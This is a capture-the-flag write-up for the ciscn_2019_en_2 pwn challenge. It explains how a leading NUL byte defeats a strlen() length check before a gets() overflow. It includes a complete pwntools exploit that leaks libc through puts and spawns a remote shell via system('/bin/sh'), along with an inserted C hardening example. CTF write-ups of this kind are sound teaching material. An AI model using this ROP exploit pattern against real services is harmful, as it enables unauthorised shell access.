
ciscn_2019_en_2

2022-06-26 00:47:00 [mzq]


Challenge address: https://buuoj.cn/challenges#ciscn_2019_en_2

main function

It mainly prints a menu and dispatches on the user's choice (1, 2 or 3). The important part is the encrypt function.


encrypt function

This function is the key exploitation point.
gets() allows an unbounded overflow. strlen() checks the length, but it can be bypassed with a leading \x00 (strlen stops at the first NUL byte). The XOR the function then applies to the input characters has no effect here.
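The length check described above fails because it measures the wrong thing: strlen() reports the distance to the first NUL byte, while gets() has already copied the entire line. The following C program is an added example (not code from the challenge binary or from this write-up) that puts the strlen()-based check beside a bounded reader which counts the bytes it actually stores and rejects lines that do not fit. The buffer size PLAIN_CAP, the sample input and the function names are constructed for the example; the leading-NUL shape of the input mirrors the payload prefix shown later on this page.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Buffer size used by this example; constructed for illustration,
 * not taken from the challenge binary. */
#define PLAIN_CAP 0x30

/* The check the write-up describes: length measured with strlen().
 * strlen() stops at the first NUL byte, so a line whose first byte is \x00
 * measures as length 0 no matter how many bytes gets() already copied. */
bool strlen_check_passes(const char *buf, size_t limit)
{
    return strlen(buf) <= limit;
}

/* Hardened reader: consume the line byte by byte so embedded NULs are counted,
 * stop at '\n' or EOF, and refuse any line that does not fit in cap-1 bytes
 * (the rest of an over-long line is drained so the next read starts clean).
 * Returns the number of bytes stored, or -1 when the line was rejected. */
long read_line_bounded(FILE *in, char *dst, size_t cap)
{
    size_t n = 0;
    int c;
    if (cap == 0) return -1;
    while ((c = getc(in)) != EOF && c != '\n') {
        if (n + 1 >= cap) {
            while ((c = getc(in)) != EOF && c != '\n') { }
            dst[0] = '\0';
            return -1;
        }
        dst[n++] = (char)c;
    }
    dst[n] = '\0';
    return (long)n;
}

/* Constructed input line: one NUL byte, then `fill` bytes of 'a', then '\n'.
 * Returns the total line length. */
size_t build_nul_prefixed_line(char *out, size_t fill)
{
    out[0] = '\0';
    memset(out + 1, 'a', fill);
    out[fill + 1] = '\n';
    return fill + 2;
}

struct check_result {
    bool strlen_says_ok;   /* verdict of the strlen()-based check */
    long bounded_bytes;    /* bytes accepted by the hardened reader, or -1 */
};

/* Feed the same constructed line through both checks. The unbounded path is
 * modelled by handing strlen() a buffer that already holds the whole line,
 * which is the state gets() leaves behind. */
struct check_result compare_checks(size_t fill)
{
    char line[256];
    char dst[PLAIN_CAP];
    struct check_result r = { false, -1 };
    size_t len;

    if (fill > sizeof line - 2) return r;   /* keep the example buffer in bounds */
    len = build_nul_prefixed_line(line, fill);

    r.strlen_says_ok = strlen_check_passes(line, PLAIN_CAP);

    FILE *in = tmpfile();   /* standard C stand-in for stdin */
    if (in) {
        fwrite(line, 1, len, in);
        rewind(in);
        r.bounded_bytes = read_line_bounded(in, dst, sizeof dst);
        fclose(in);
    }
    return r;
}

int main(void)
{
    struct check_result r = compare_checks(87);
    printf("strlen check passes: %s, bounded reader result: %ld\n",
           r.strlen_says_ok ? "yes" : "no", r.bounded_bytes);
    return 0;
}
```

With 87 filler bytes the strlen() check still reports success (it sees only the leading NUL), while the bounded reader rejects the line because it does not fit in the 0x30-byte buffer; a short line of 10 filler bytes is accepted by both, and the bounded reader reports 11 bytes stored, NUL included. The fix is to decide on the number of bytes actually read, never on strlen() of attacker-controlled data.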


But there is no backdoor function in the program, so we need to leak the address of system in libc and the address of /bin/sh in order to build the ROP chain.

exp

from pwn import *
from LibcSearcher import LibcSearcher

# io = process('./ciscn_2019_en_2')   # local debugging
io = remote("node4.buuoj.cn", 29425)
elf = ELF('./ciscn_2019_en_2')
puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
_start_addr = elf.symbols['_start']
pop_rdi = 0x0000000000400c83   # pop rdi ; ret gadget
ret = 0x00000000004006b9       # single ret gadget

# The leading \x00 makes strlen() see length 0, so the length check passes
# and the XOR does nothing, while gets() still copies the whole line.
payload = b'\x00' + b'a'*87 + p64(pop_rdi) + p64(puts_got_addr) + p64(puts_plt_addr) + p64(_start_addr)

io.sendlineafter(b'Input your choice!\n', b'1')

io.sendlineafter(b'Input your Plaintext to be encrypted\n', payload)
io.recvline()
io.recvline()
#puts_addr = u64(io.recv()[0:8])
puts_addr = u64(io.recvuntil(b'\n')[:-1].ljust(8, b'\0'))
print(hex(puts_addr))
#libc = LibcSearcher('puts', puts_addr)
#libcbase = puts_addr - libc.dump('puts')
#print(libcbase)
#system_addr = libcbase + libc.dump('system')
#binsh_addr = libcbase + libc.dump('str_bin_sh')
libc = ELF("libc-2.27.so")

# Leaked puts address minus its libc offset gives the libc base
offset = puts_addr - libc.symbols["puts"]
system_addr = libc.symbols["system"] + offset
binsh_addr = next(libc.search(b"/bin/sh")) + offset
payload = b'\x00' + b'a'*87 + p64(pop_rdi) + p64(binsh_addr) + p64(ret) + p64(system_addr) + p64(0)
io.sendline(b'1')
io.recv()
io.sendline(payload)
io.interactive()

Copyright notice
This article was written by [[mzq]]; when reposting, please include the link to the original. Thanks.
https://yzsam.com/2022/177/202206252235318729.html